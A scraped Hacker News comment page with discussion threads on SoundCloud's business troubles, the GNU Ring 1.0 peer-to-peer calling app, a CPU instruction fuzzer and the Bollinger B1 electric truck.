Every time this comes up, it seems to me that the obvious answer is that we should get rid of the secret ballot. If everyone's vote is public then everyone can check that their own vote was counted correctly. I know the argument is that people may face pressure at home and be afraid to vote, but is there anyone left who doesn't tell everyone how they voted? Maybe I'm living in a bubble, but I know exactly who all of my friends, and family voted for, none of them ever tried to keep it a secret.
SoundCloud's Collapse buzzfeed.com
406 points by prostoalex  2 days ago   319 comments top 42
sgentle 2 days ago 8 replies      
Never do a music industry startup unless you have a billion dollars, can raise a billion dollars, or plan to be acquired by a company with a billion dollars to spare. That's the table stakes for going toe-to-toe with the big three.

They'll bleed you to death with licensing fees, deputise you into their copyright enforcement police, upload their songs to your platform on one hand while suing you with the other, and all the while cry about how extracting monopoly profits is so much harder than in the old days.

Just go disrupt something safer, like organised crime or the international diamond trade. At least with those the law probably won't change out from under you.

bogomipz 2 days ago 2 replies      
>"In November 2014, SoundCloud closed a deal with Warner Music Group, giving the label an undisclosed cut of revenue from ads, a 3%5% stake in the company and protection against past copyright infringement from the label."

This sounds like terms dictated by the Mob. It's quite telling that the deal also conferred ownership on a content holder in order to be able to license and pay handsomely for their content. This is only one of the big 4 they were negotiating with too. By the time they get done negotiation with the other 3 they would have likely given up 15% of the company. Note the big 4 all have stakes in Spotify as well[1].

At any rate I think this should have been a sign that they were going down the wrong path. Propping up these labels and hitching your wagon to them, only to have to constantly renegotiate your deal with them every couple of years seems contra to a platform that gave artists direct access to music fans without the middle man.

[1] http://www.swedishwire.com/jobs/680-record-labels-part-owner...

k-mcgrady 2 days ago 2 replies      
SoundCloud could have been a nice business if they hadn't got greedy. From the beginning (or close to it) there have been various paid accounts for artists which a lot of people used. SoundCloud was the best place to discover new music from unsigned artists. There were unsigned artists with tracks on it that blew up and eventually got picked up by major labels.


- SoundCloud neglected the platform.

- Then they did one of the worst redesigns of any site I've seen (try reordering a track in your spotlight [paid feature] in Chrome. Crashes the tab and has done for years. I need to open another browser to do that.).

- Then it became overrun with major label artists.

- Then they started offering features just to the big artists - various UI/branding options - (forgetting about the artists that got them to where they were).

- Then they did the whole paid streaming mess which they were never going to succeed in. Anybody could have told them that, I really don't believe anyone in that company thought 'Go' would work. I think they just needed to do something.

I'm not sure if they've taken so much money now that this isn't possible anymore but if I were CEO I would take it back to it's roots. Focus on the unsigned artists. Fix the site. Offer a distribution system (like CDBaby/TuneCore) so that SoundCloud can be a one-stop show for unsigned artists. Now you've got paid accounts (for stats/spotlight/unlimited upload space) and a small cut of distribution on all paid platforms.

I don't understand how in a world where more artists are getting big without label help nobody is offering a great platform for them. SoundCloud got very close in the past. BandCamp has gotten close too (although it lacks the social/sharing/viral aspect of SoundCloud). If SoundCloud does end up shutting down it's due to greed and poor management. Instead of focusing on what they do well and what people use them for they've tried to go after the money and they were much too late making that move to get any of it.

iagooar 2 days ago 10 replies      
This shows us, that company valuations are ridiculous and actually mean nothing.

Is SoundCloud worth a billion dollars? Well, it might be on paper or in the imaginations of the founders, but what does it really mean? To me, it's worth nothing.

The real problem is: these companies start to operate from the perspective of "having" those millions of dollars. This is why they hire too many people for too much money. They spent hundreds of thousands on marketing.

But in the end, you know what? They need to beg for money to pay their debts. They need to lay off dozens of employees because they don't have the money to pay them.

What if SoundCloud would have kept a small, yet highly skilled engineering team of maybe ~20 people, some marketing and sales, and try to not outgrow themselves? Probably they'd be having a huge surplus each year because their costs would be small and sustained.

When I read stories like these, I actually feel good about my bootstrapped, down-to-earth startup. We don't make millions, we don't "disrupt" the industry, yet we solve our customers' problems and delight them. We won't ever run out of money, as we carefully check each and every expenditure, and have growing savings in the bank.

kowdermeister 2 days ago 1 reply      
"Jeff Toig's preferred PowerPoint style is size 10 Arial font with a black background. An earlier version of this story misstated the color."

This is the funniest correction I've ever read :)

xfer 2 days ago 4 replies      
> According to one former SoundCloud Berlin employee, a lack of direction from Wahlforss, who served as chief technology officer, made things worse, with some engineers going rogue and rebuilding their colleagues work in their preferred programming language.

Does this happen at other startups?

thinbeige 2 days ago 4 replies      
I read this article few hours earlier when crawling through the new section. It's a surprisingly interesting piece from Buzzfeed but there's a lot of bashing of the CEO, the CTO and one recently hired senior for label relations (who seem to be really odd).

This is typical: SoundCloud was an iconic company, its founders worshiped and idealized. Once money runs out, people but especially former employees start to backstab, blaspheme and blame loud and clearly. Why not before? Now when everybody is hitting SoundCloud it's easy and risk-free to join the hate. All the NDAs they once signed seem to be gone? To be fired also means fire and forget for them.

I never believed in SoundCloud. The founders did a great job building a huge brand and DNA out of nothing but the business model is by design broken or to put it simply, you just can't do business with music labels.

Btw, where is Fred Wilson? The biggest proponent and investor of SoundCloud who didn't miss an opportunity to tell us that sound is the future stays silent and hasn't commented this tragedy once. A VC just for good times?

EDIT: Why the downvotes? Mind to share your view?

bogomipz 2 days ago 1 reply      
Not showing up to company retreats, circulating pictures of yourself taking private jets and hanging out with celebrities in Ibiza, doing a Ferragamo ad - CEO Alexander Ljung sounds like Erlich Bachman.

It's easy to write those things off as petty gripes but I think they are important in that illustrate a CEO who doesn't understand that those are bad "optics" for employees who are seeing layoffs and lack of funds available to higher talent. And a CEO who doesn't understand the nuances of this might also not see the nuances of lots of other important areas of their business. Why does the board not remove him?

whofailed 2 days ago 3 replies      
Contrarian here:

Soundcloud is an incredibly valuable property. They have obviously had a few managerial cock-ups, but in reality they have massive user buyin, huge network effect, and anyone who can get some equity in them during this current time of massive negative sentiment is going to do VERY WELL. I wish I had a way to buy in at this point.

ThomPete 2 days ago 0 replies      
After 4 1/2 years at Square colleague of mine and I, left Square to start our own portfolio of small productivity tools some we are building ourselves and other we will probably be acquiring.

Our first rule was that we will not get funding for anything than scaling a business once it hit some sort of product market fit.

Until then there is only bootstrapping. This is to avoid something like SoundCloud where you become numb to the die hard reality of needing to build a business before you build an organization, get fuzzball tables and promote your altruistic business principles.

nunez 1 day ago 0 replies      
I haven't used SoundCloud that much, but the last time I seriously used it was in late 2015 for finding solid trap music. Finding unsigned material was a lot easier in 2014 than in 2015; everything in the first few pages was from huge signed artists.

I also gave Go a chance so I could download stuff I liked onto my iPhone. It was such a confusing service. I paid $9.99/mo to download tracks. There was no way to download albums. It was also difficult to find things that I wanted to hear. I cancelled after a month or so.

TekMol 2 days ago 0 replies      
Is there a collapse? They used their VC money to pay employees to build stuff. Now the money is spent. Employees get layed off.

It could very well been worth it. What has been built might bring in return on invest for a long time.

Isn't that normal? Isn't VC money intended to be used that way? Are VCs demanding to build jobs for eternity? Or is there some moral reason to not grow and shrink the work force while building a company?

sddfd 2 days ago 0 replies      
What I never understood was why they were opening offices in SF, NY, and London, without having the revenue to back them up.

In my eyes that was just flushing huge amounts of money down the drain.

Briel 1 day ago 0 replies      
There's a lot of focus on how they failed: strayed from their non-label musician roots.

But how would they have been able to monetize?

* Let fans support their favorite musicians a la Patreon and take a % from the donations?

* Partner with music labels to help them scout their next upcoming talents?

* Help musicians book shows at venues and take a % of the sales?

parasubvert 1 day ago 1 reply      
Open source remains an important force of continuity for technology professionals, as even though SoundCloud is failing, they brought us a very important piece of infrastructure that will carry on: http://Prometheus.io

It has been catching on like wildfire everywhere I look, even big conservative companies. It feels like the new Nagios (in a good way).

Mikho 17 hours ago 0 replies      
SoundCloud problem was that it tried to chase and copy competitors instead of being unique--but it has truly unique user experience which it completely ignores (probably need to write about it a blogpost). By following competition you don't win. You don't get a leadership position. You just lose slower.

As a result, SoundCloud faced a notorious problem of wholesale transfer pricing [1] power. And it didn't have enough money to win or even participate in that battle.

[1] Wholesale transfer pricing = the bargaining power of company A that supplies a unique product XYZ to Company B which may enable company A to take the profits of company B by increasing the wholesale price of XYZ.

StreamBright 2 days ago 0 replies      
Well, there were several attempts from different groups, companies and people to build on their API that failed for no good reason. They simply decline the API access request without any reasoning. They could have made money from 3rd parties, or even through selling music directly on their site. I usually go to Soundcloud to discover music and than to Bandcamp to buy it. I am not sure why this was never a focus to them.
loomer 2 days ago 0 replies      
It seems Discord is in the early stages of something like this. They have dozens of employees and a pre-money valuation of 725 million US dollars. However, very few users are buying their premium service, with most saying it isn't worth it, with this paid version only coming out a year after the release of Discord.
playing_colours 1 day ago 0 replies      
As one of the engineers in those 40% fired, I asked myself if I should try to start a startup: use this [0] money, plus try to raise more in the current situation. Say, to implement a good old vision of SoundCloud - a cozy creator-driven music catalog, with communities, and features like real time streaming. But I guess, even if we succeed initially, the company will be eventually killed by the major labels, copyright infringement cases, etc. It's a rough territory.

[0] http://www.thefader.com/2017/07/26/wetransfer-soundcloud-emp...

misingnoglic 2 days ago 0 replies      
SoundCloud used to be /the/ place for indie musicians to post their work - now I think websites like Bandcamp have more or less taken over. This article explains why - they basically stopped focusing on the artists - but I'm surprised they didn't mention competitors.
Myrmornis 2 days ago 1 reply      
This seemed to me a very sad story. The time during which SoundCloud as it was known and loved really existed was the era before they were really worrying about their "business model". As soon as they contemplated how they could exist long term, they started copying mainstream music services in a way that no-one loved. The real question is: given how much amazing free content there is, how are we going to nurture valuable cultural ecosystems like soundcloud, and create a meaningful and stable niche for them and their employees in our economies?
tovkal 2 days ago 0 replies      
It's always sad when a company has issues for months and nobody either sees them or acts during that time. Though 'Desde la barrera todo el mundo es torero'.
candiodari 1 day ago 0 replies      
> Deals with the labels would have allowed us to have monetization, said one former executive, who explained that no ads could be run across label-owned content without a revenue-sharing agreement.We needed to make sure that we could grow unencumbered without a lawsuit.

This sounds like a serious mistake. All the ones that succeeded asked for forgiveness afterwards rather than wait until they had permission.

arihant 1 day ago 0 replies      
I think the reason is that music subscription services took off in last 2-3 years massively, and globally. Apple Music expanded to a good number of nations, so did Spotify and others. And so it has also become very easy for creators to put their music on those services. There are SaaS apps that put unlimited music on all platforms for artists for as little as $20 a year.

You don't need to partner with record label any more to be on iTunes, Apple Music, Pandora, Google Play, Spotify, etc. You need $20 a year. The goliath that SoundCloud was fighting killed itself.

As a creator, I know there are 10x more people listening on Apple and Spotify. There is simply very less reason to upload on SoundCloud except for community. And it is the community that they managed to piss off by partnering with the labels.

jackninja1 2 days ago 0 replies      
I think a few things are needed in order for SoundCloud to restore some of its value:

- They need to evaluate how their (IMHO) only competitor HypeMachine does its things, and if possible consider an acquisition

- While probably very costly they need to redesign their website (and app), their latest redesign was received very negativly

shp0ngle 2 days ago 0 replies      
I would be interested in how BandCamp is doing. They seem to have a product that both sides of the deal actually like - both buyers and sellers - and they have a business model from the start.

I have no idea how big BandCamp is, in terms of both users and developers.

pasta 2 days ago 1 reply      
Maybe I'm missing something but this article is telling me Soundcloud is dead. But is it?

Yes they are having a hard time but it there no way to continue with a small team?

As a Soundcloud user there is nothing telling me it is dead. Fresh music every day. So it's not like an exodus is happening.

philipps 2 days ago 0 replies      
I would hate to see SoundCloud disappear or get dismantled in an effort to migrate its user base into a different social network. The core idea, to provide a way for amateur creators to share their music, and connect with an audience, is sound. I also think there is/was a gap in the market for podcast creators that SoundCloud authoring tools could have filled. Can some combination of charging creators for advanced authoring or analytics, and placing ads in a free listening tier, not provide sufficient income to keep something like this going?
snakeanus 2 days ago 0 replies      
While I feel sorry for their employees I am quite happy that this happened. The censorship that they applied to the content that they hosted was quite disgusting.
demarq 2 days ago 0 replies      
Bringing up the bieber situation is entirely unfair. SoundCloud did the best any company could have done in that situation. His own label was also confused by the move.
blitzprog 2 days ago 2 replies      
From a consumer perspective, SoundCloud lost my interest when I heard it's 128 kbps transcoded mp3 you're getting when streaming songs.

No thanks.

bokglobule 2 days ago 0 replies      
The tech industry keeps repeating the same business mistakes. This period strikes me more and more of the 1998-99 era when there was so much euphoria that there was no way but up. Then March 2000 came, the first Internet high flyers started to fail, and very quickly the whole thing unraveled. We're on the same road again...
drenvuk 1 day ago 0 replies      
Is it not possible to make a browser extension or app to "wrap" youtube and turn it into a soundcloud like service? Seems to me they could transition a lot of their users over to it and possibly save money.
Rjevski 2 days ago 0 replies      
Personally I lost interest in late 2013 when they redesigned their UI (and made it crap) and started adding ads soon after. No thanks.
cubano 2 days ago 1 reply      
So what the hell is wrong with me?

I use SC everyday almost...I don't get this "collapse"?

Should I turn in my coolkid badge now?

rv77ax 1 day ago 0 replies      
Instead of pursuing major record label, did they not even though about creating one?
shmerl 1 day ago 0 replies      
They could do what Bandcamp did instead. Bandcamp is growing.
BadassFractal 1 day ago 0 replies      
Should music creators who want a place to upload and get feedback on their work move to a different platform now or is SoundCloud going to be around for that for the foreseeable future?
briandear 1 day ago 0 replies      
Arial? Theres the problem right there.
erikb 2 days ago 4 replies      
If anybody else is also put off by the writing style: There is some actual content there. One just needs to get through the first third which basically just repeats the headline.

TL;DR (without my opinion added): Top Management started too late to think about making actual money. They also hired an asshole for their US offices. When they got an opportunity to be bought by Twitter they asked for way too much money. And the CEO is bascially on a constant holidays trip since 2014, while not failing to rub it in everybody's face via Instagram photos.

Personal opinion: I don't understand these CEOs who start cashing out before either selling their business or making it a viable paid service, while being so close to a lifetime solution to the problem of money. I mean he already went 80% of the way, much further than most.

Doctor_Fegg 2 days ago 3 replies      
Worth reading to the end for the deadpan Correction.
MIKarlsen 2 days ago 3 replies      
That's the second time this week I see Buzzfeed coming out with something that resembles decent journalism. Coincidence, or have they turned their ship around?
GNU Ring 1.0 released ring.cx
419 points by kilburn  4 days ago   184 comments top 27
kilburn 4 days ago 5 replies      
I've been testing it out, and it does not seem like an 1.0 release by any stretch of imagination.

- On a mac, the client crashes regularly. I've been able to register an account and make a video call, but there are several GUI issues (cut labels, missing text fields, etc.) and the name registration didn't seem to work.

- On android, the client acted really weirdly in the beginning. After a while it seems to have stabilized a bit, and I've been able to make a video call (to a mac). The video quality was fine, but the client did not handle screen orientation changes well (my own video feed ended up distorted).

- On linux I haven't been able to make a call, even though text chat worked. It may have been because I don't have a webcam...

All in all, the experience was far from what you would expect from an 1.0 release nowadays. It had major warts on all platforms I tested.

Also, if anyone is curious, you can login with the same account from several devices at the same time. Calls ring on all devices, but text messages are less reliable (they don't always reach all devices). Also, off line devices do not get the messages they missed when you fire the client later on.

I would love and push hard to replace skype/xmpp with a solution of this kind, but I just cannot in the current state of affairs :(

Rjevski 4 days ago 4 replies      
Every time I see "GNU" I fear that it'll be more about "freedom" than actual functionality. Is the product actually any good (or at least on par with Skype, Hangouts, etc) or is this just something for free software fans to brag about with no productive use-case?
djezer 4 days ago 2 replies      
This is the brainchild of one the the founders of Savoir-Faire Linux. I was an employee of theirs and had to use this software for internal communications. It rarely works, crashes a lot and employees would crack jokes everytime we were told to use it. The idea is good. The current state of the app is barely useable. They just fired around a third of their employees (after promising to double in size).
Galanwe 4 days ago 9 replies      
Disclaimer: ex Skype employee.

Looks like a Skype clone from 10 years ago to me.I cannot see this working in the long run. Many people naively think that Skype switched from full p2p to partially p2p to server centric because of some evil plot designed by Microsoft. This is all wrong. Skype abandonned full peer to peer because it does not work if you want something fast, reliable, and feature rich.

1. Asking users to enable upnp is a joke. I would never do that, and anyone doing so should consider the security implications of doing so. Unfortunately, since they want to stay pure p2p they have no other possibility to solve the "both clients behind a NAT router" problem. This is why Skype relies on STUN like protocols => not possible in pure p2p.

2. Peer discovery in pure p2p is SLOW. Skype understood that and switched to hosted "supernodes" with their IPs hard-coded in the client. It's the only way to have reliable peers to introduce you to the network.

3. You WANT dedicated peers with good connection and 100% uptime.

4. You cannot efficiently have shared states in pure p2p without an identity server. That would require the clients to bring their keys with them on every device, not very practical.

5. In case the network collapses, there is no way for it to go up again without supernodes.

rvern 4 days ago 5 replies      
Unlike so many communication platforms created in this day and age, Ring provides something more than reinventing the wheel and following the latest trends. It is peer-to-peer, which XMPP and Matrix aren't. This is a step forward.

Edit: As some comments note, I previously wrote decentralized while meaning peer-to-peer.

chriswarbo 4 days ago 1 reply      
From https://tuleap.ring.cx/plugins/mediawiki/wiki/ring/index.php... I see the following under "Ring archive (export.gz)"

> Contains private account data.

> It's a JSON compressed and encrypted file.

> The JSON byte-stream is compressed using gzip algorithm.

> Then the gzip-stream is encrypted using AES-GCM-256 symmetric cipher with a 256-bits key.

Does this compress-then-encrypt combination introduce a security weakness? It's certainly a problem on the Web, since attackers can learn what's in an encrypted response by getting the server to insert their own strings; e.g. trying the same request many times with different query strings, and seeing which ones result in smaller responses, indicating that the given query string matches somewhere in the document.

It would require the attacker to be able to get their own strings in the payload, but since this JSON contains things like contact info that might be possible.

onli 4 days ago 2 replies      
Does someone have that running and would share its current state? I tested ring at the beginning of this year and it was a disaster. Does it work now?
nannal 4 days ago 0 replies      
Is there somewhere we can dump bug reports, this feels so unready for 1.0.
kk_cz 4 days ago 2 replies      
from the tutorial:

> Please note that you shouldn't forget your password as long as you are using the current account. If your forget it, you won't be able to change it or get another one.

I can already see it being mass-adopted by non-tech users. /s

whoami_nr 3 days ago 0 replies      
This seems extremely ideal in a scenario where everyone has switched to IPv6 and punching through the NAT's is no longer a problem.
kwhitefoot 3 days ago 0 replies      
Does anyone know how to install this on Linux Mint 18.2? It seems to depend on packages that are not available. As there were no instructions for Mint I tried the instructions for Ubuntu 17.10 but it fails:

Reading state information... Done

Some packages could not be installed. This may mean that you haverequested an impossible situation or if you are using the unstabledistribution that some required packages have not yet been createdor been moved out of Incoming.

The following information may help to resolve the situation:

The following packages have unmet dependencies:

ring : Depends: libebook-1.2-19 (>= 3.17) but it is not installable

 Depends: libedataserver-1.2-22 (>= 3.17) but it is not installable Depends: libqt5core5a (>= 5.7.0) but 5.5.1+dfsg-16ubuntu7.2 is to be installed Depends: ring-daemon (= 20170724.1.2088f8e~dfsg1-1) but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

amingilani 4 days ago 1 reply      
If you're trying to check this out and don't have anyone to talk to, like me, here's my contact info:

Contact me using 'gilani' on the Ring distributed communication platform: https://ring.cx

BTW, on Android, I had to setup my username after creating my account.

fulldecent 3 days ago 1 reply      
Is it just me or does anyone else think this will be a lame project just because it of GNU stewardship?
gboudrias 3 days ago 0 replies      
> Savoir-faire Linux

Love these guys! They're based in Montreal, definitely the biggest Linux-only player I know around here.

> Libert, galit, Fraternit

That's a really bad name for a release. I speak French natively but... Nah.

The criticisms about missing features seem pretty reasonable as well, BUT I'm not afraid of this project being more ideological than practical. For one thing, SFL is in the money business, they are not a charity. For another, sometimes it takes someone to take the extreme "free" approach for someone else to approach the middle ground of "maybe not that free but still distributed".

anw 3 days ago 0 replies      
I am unable to create a public account. I get a spinning wheel when I input a public name, and it doesn't do anything else. The create button is disabled until (seemingly) I get a response back telling me my chosen name is okay or not.

Unfortunately, their Web site didn't seem to have any clear way to register an account.

Another point is that searching for contacts only works if you type in their last name. If you try searching for a contact by first name, then they won't show up.

scrumper 4 days ago 1 reply      
For those in the dark who don't want to do the digging I just did, Ring is "some sort of Skype or Hangout," toquote one of the project leaders.
kodfodrasz 3 days ago 0 replies      
Its not there yet, but seeing that skype is repositioning itself as a shitty wanabe snapchat/instagram, instead of the conferencing and telephony app, I hope it will mature and become a thing. (Hey microsoft, what will the office365 customers do with skype minutes, when you finish the repositioning?)

They could sell SIP minutes and make it simple to set up, and that could provide a revenue for them.

out_of_protocol 4 days ago 3 replies      
Could anybody point me to docs? Can't find any explanation how it works exactly, the only explanation i can find is <list of buzzwords>
random3 3 days ago 0 replies      
It's a bit unexpected not to post the binaries signatures along with the downloads, given the motivation of the project..
mempko 3 days ago 0 replies      
Seeing this makes me really want to add video support to my Firestr (http://firestr.com) project. Also a DHT so I can store public keys and have shorter payloads to share. Alas I am only one man.
coo1k 3 days ago 0 replies      
Is this similar to bitmessage?https://www.bitmessage.org/wiki/Main_Page
cyborgx7 3 days ago 0 replies      
I've been reading the site and can't figure out what differentiates it from tox.
dna_polymerase 4 days ago 0 replies      
Apparently there is no release for Debian 8 Jessie. Is everyone on 9 already?
rufugee 3 days ago 2 replies      
For something that's free and not foisted upon anyone, there seems to be a lot of negativity here. Okay, so it's not as good as you want it to be. Roll up your sleeves and make it happen.
jonstokes 3 days ago 0 replies      
A friend told me that if you use the Ring then 7 days later all your files will be deleted.
yebyen 4 days ago 2 replies      
The Mac version warns me that I won't be able to run Ring because of my security settings and directs me to the Mac App Store to look for a newer version. Quite literally rolling on the floor laughing! (No, not literally)

In the Finder, locate the app you want to open. Press the Control key and click the app icon, then choose Open from the shortcut menu. Click Open. I have never seen any Mac app for which I have ever needed to do this. Apple thinks it should warn me that I might have downloaded malware.

Does this mean that GNU did not pay the Apple tax?

fiatjaf 4 days ago 3 replies      
There is a GNU cryptocurrency project that aims to give the State the power to tax the users of the currency. How can you trust anything with the GNU label after that?
Sandsifter: find undocumented instructions and bugs on x86 CPU github.com
444 points by argorain  4 days ago   91 comments top 20
mcculley 4 days ago 3 replies      
This is great. That a program can learn about and exploit the CPU on which it is running from unprivileged userspace reminds me of the notion in Charlie Stross' Accelerando of running a timing attack against the universe to learn about the virtual machine in which we are being simulated.
_wmd 4 days ago 3 replies      
tl'dr of the slides:

 Found on one processor... instruction Single malformed instruction in ring 3 locks Tested on 2 Windows kernels, 3 Linux kernels Kernel debugging, serial I/O, interrupt analysis seem to confirm Unfortunately, not finished with responsible disclosure No details available [yet] on chip, vendor, or instructions
He's found a new f00f bug, winter 2017 is going to be interesting :)

hellbanner 4 days ago 2 replies      
Related: https://www.theregister.co.uk/2013/05/20/intel_chip_customiz...

"Everybody hates the golden screwdriver upgrade approach, where a feature is either hidden or activated through software, but the truth of the matter is that chip makers have been doing this sort of thing for decades and charging extra for it."

""We are moving rapidly in the direction of realizing that people want unique things and they are going to want them in silicon. In some cases, it will be done in software," said Waxman."

Also, Github says "several million" undocumented instructions.. is that right? I don't know much about assembly but that number sounds absurdly high.

dtx1 4 days ago 2 replies      
This is highly interesting. I assume a lot of those are going to be debug and instructions to help the binning process. Some of these might even unlock access to parts of the CPUs we aren't supposed to have access too, opening the doors to custom microcode (unlikely that anyone outside the CPU OEM can do that though) but may allow us to disable "security features" such as the Management Engine. This is a really interesting approach and i would love to see the results ported to other hardware/vendors. The same could potentially be done with GPUs, ARM-CPUs, etc.
fovc 4 days ago 0 replies      
partycoder 4 days ago 1 reply      
SAI_Peregrinus 4 days ago 1 reply      
Christopher Domas does some very cool work. His System Management Mode exploit a few years back was quite nice. It will be interesting to see which processor it is that he found the ring 3 hard lockup instruction in...
d33 4 days ago 2 replies      
...isn't the usability of the tool limited because it's running in userspace, which has fewer privileges in terms of what instructions can be ran?
tonyg 23 hours ago 0 replies      
I wonder what dbe0, dbe1, and df{c0-c7} do? They are present and undocumented in all of Intel, AMD and VIA's variations (see p4-p5 of the paper).
partycoder 4 days ago 0 replies      
Lot of weird stuff done happening nowadays in CPUs.

There's a lot of mystery in microcode (equivalent to the CPU firmware), the "system management mode" aka protection ring -2, and the infamous management engine.

brawny 2 days ago 0 replies      
Out of curiosity, are there any toy compiler projects out there that try and make use of the incedental instructions? Could you possibly expect to see a with while performance boost (I'm thinking it would be unlikely...)
pbsd 3 days ago 0 replies      
For what it's worth, the size-prefixed jcc/call binutils bug had already been fixed a couple of years ago: https://sourceware.org/bugzilla/show_bug.cgi?id=18386
rurban 3 days ago 0 replies      
Regarding the ring 3 hard lockup he didn't disclose yet: isn't that the recent kaby lake/skylake error, released about a month ago?
pwdisswordfish 3 days ago 1 reply      
The slides mention an 'apicall' opcode 0ffff0; searching the web turns up nothing but these same slides. Does anyone know anything about it?
ngneer 3 days ago 0 replies      
Chip vendors do the same in the course of validation, and technically even before any silicon has been fabricated, using simulators.
egberts1 3 days ago 1 reply      
found another that is QEMU-specific.


purpleidea 4 days ago 0 replies      
wow... anyone have a link to the video of his talk?
shdon 4 days ago 2 replies      
No instructions there to disable the IME?
pmarreck 4 days ago 1 reply      
Is this basically a CPU fuzzer?
m00dy 4 days ago 0 replies      
Someone built a fuzzer for cpus
Elm in Production: 25K Lines Later charukiewi.cz
436 points by Albert_Camus  1 day ago   254 comments top 17
ToJans 1 day ago 7 replies      

> Elm has an incredibly powerful type system

Near the end of the article:

>Want to decode some JSON? Hard, especially if the JSON is heavily nested and it must be decoded to custom types defined in your application.

IMHO the lack of typeclasses/traits is really hurting Elm. Take haskell f.e.

 {-# LANGUAGE DeriveGeneric #-} import GHC.Generics data Person = Person { name :: Text , age :: Int } deriving (Generic, Show) instance ToJSON Person instance FromJSON Person
While I understand Evan's aversion against complexity, it makes me a bit wary about using ElmLang in production. I am currently using TypeScript, but if I would need a more powerful type system, I would probably switch to Haskell/PureScript or OCaml/BuckleScript instead.

antouank 1 day ago 2 replies      
After doing a couple of contracts on Elm projects for several months, and returning now back to a React-Redux stack project, I cannot emphasize enough how much better working with Elm is.

In every single aspect.I just wish that it will get mainstream as soon as possible.

His article is spot on, and agrees with what I've seen, and most others that used Elm. Just look it up.

dmjio 1 day ago 9 replies      
If decoding json in Elm is considered hard, I'd recommend checking out miso (https://github.com/dmjio/miso), a Haskell re-implementation of the Elm arch. It has access to mature json libraries like aeson for that sort of thing, along with mature lens libraries for updating your model. Here's an example of decoding json with GHC.Generics using typeclasses. https://github.com/dmjio/miso/blob/master/examples/xhr/Main....
endgame 1 day ago 5 replies      
I'm really looking forward to the day when all these new-to-Elm people start hitting the complexity ceiling of their language and convince the maintainers to add just a little more power. Example: Haskell's typeclasses have a high power-to-weight ratio, and Elm has to work around their absence (e.g., writing a fresh map function for each data type). Once there's a critical mass of frontend types who understand the power of FP, convincing people to try FP won't be the difficult step any more, and Elm won't need to try so hard to be un-intimidating.
advanderveer 1 day ago 1 reply      
What an excellent article: from tech to business, from the human aspect to practical code examples. Worth a read, even if you're not considering Elm.
dmitriid 1 day ago 3 replies      
> making very heavy use of Ajax calls to a JSON-based RESTful API

and then

> Want to decode some JSON? Hard, especially if the JSON is heavily nested and it must be decoded to custom types defined in your application. Doing this will require an understanding of how JSON decoding works in Elm and will usually result in quite a bit of code (our application contains over 900 lines of JSON decoders alone).

What a great pragmatic language

iamwil 1 day ago 1 reply      
Having started using Elm for side projects over 3 years ago, the article is pretty much spot on.

Programming in Elm had been a delight, especially when you let go of OOP and embrace functional concepts and practices. On one hand, you lose mental tools that you've relied on, but you gain the other tools you didn't even know existed before.

Where I really disliked about Elm is when I had to encode or decode JSON. It's a giant royal pain in the ass. Also, when you find you have to break out to JS often for libraries you don't want to write yourself, it's not a good fit--as I found out when write a toy interactive notebook to render markdown in Elm.

But for most SPA that just manipulate form data and communicate with the server, it's a pretty great fit.

noshbrinken 16 hours ago 1 reply      
Something I find incredibly off-putting about Elm is the evangelical and generally unbalanced tone taken by many prominent members of the Elm community. I almost never come across Elm advocates accepting a valid criticism of the language. The response almost always amounts to "you don't understand" or "yes, but". They spend a lot of time celebrating the compiler's humanistic virtues but seem less clearly humanist in their relation to original thinking or diversity of thought. So much of Elm community dialogue (in talks, in articles, in the Elm slack which I follow daily) is simply those with more experience initiating those with lesser experience into the "Elm way" of doing things. For this reason, Elm feels more like a framework with a domain specific language than a fully qualified programming language. And while it might seem like a gentle introduction to functional programming techniques, I'm not confidant that it really teaches people the concepts themselves nor gives them enough room to think critically about how to apply them. Instead, the task is to internalize and apply the "Elm way". The inability to even acknowledge the unprecedented labor required simply to parse a JSON response is a perfect example of the cultish mentality emerging in this community.
steinuil 1 day ago 0 replies      
I've used Elm for a while and I don't really see what's the problem about JSON decoders/encoders. Sure, they're verbose and annoying to write if you have a particularly intricate JSON structure, but I don't really see a better alternative for decoding and encoding JSON in a type-safe way, and with Elm's constraints on ease of learning.

More freedom on type-level programming would help, but that would certainly complicate the type system, and the only language I know that lets you fold over arbitrary record types is Ur/Web, which has a richer type system than even Haskell, and I don't see Elm adding things to its type system (other than type classes, hopefully), given that other interesting features were already removed because very few people used them.

delegate 1 day ago 2 replies      
Anyone familiar with both Elm and Clojurescript ?

Clojurescript's 're-frame' lib implements something similar to the Elm architecture and is quite pleasant to work with.

How does the Elm experience compare to the Clojurescript experience ?

unabst 23 hours ago 0 replies      
Quick question.

> Want to measure the height of an element on the page at the moment a user clicks on it? Hard, in order to do this we had to make heavy use of event bubbling and writing JSON decoders for the native event.target object that is produced by an onclick event.

What would be considered best practice?

Is it best practice to re-implement this sort of thing? Seems one could easily find vanilla JS code and encapsulate it, or add a helper lib?

fiatjaf 1 day ago 0 replies      
I think JSON decoding is great in Elm. Actually, that may be the best part of that language.
therealmarv 1 day ago 2 replies      
When JSON decoding is hard this is not a minor thing when looking at my RESTful APIs. This is a major trade off. How to deal with it ideally?
acobster 1 day ago 1 reply      
Great article! I have no experience with Elm but I'm much more likely to try it out now. I'm curious to hear your thoughts on this though:


niels 1 day ago 2 replies      
When I last tried Elm, I didn't find any really good UI libraries. Also there weren't any good solutions for i18n. Has the situation changed?
anon335dtzbvc 1 day ago 1 reply      
"JSON-based RESTful API as its back end" what language do you use for the backend, Haskell?
bandrami 1 day ago 1 reply      
I wonder if its successor framework will be called pine.
Bollinger B1: An electric truck with 360HP and up to 200 mile range theverge.com
314 points by smacktoward  4 days ago   272 comments top 43
masklinn 4 days ago 3 replies      
Looks interesting, the front trunk and cut-down "UI" look especially great. This looks like an EV you could actually work on in your garage.

Vaporware until they get a production line though, and the absence of airbag is somewhat worrying when it advertises a top speed of 127mph and 0-60 in 4.5, at a GVWR 10klbs it's outside the light truck regs (8.5klbs GVWR) and thus doesn't require them but still...

Of note, the Verge article is light on useful pictures, there are other sites with interesting pics especially of the interior: http://www.motorauthority.com/news/1111790_bollinger-b1-the-...

And while it has the same dimensions as a Wrangler it avertises 2~3 times the curb weight and towing capacity and almost twice the cargo volume (rear seats stowed). And the maximum ground clearance is pretty ridiculous as well (advertised as adjustable from 10 to 20, most trucks seem to be between 8 and 12)

tyingq 4 days ago 9 replies      
I know it's a prototype, but I wonder how much thought was put into safety. The simplistic look makes you think there's probably no crumple zones. And there's clearly no driver's airbag, dashboard padding, etc.

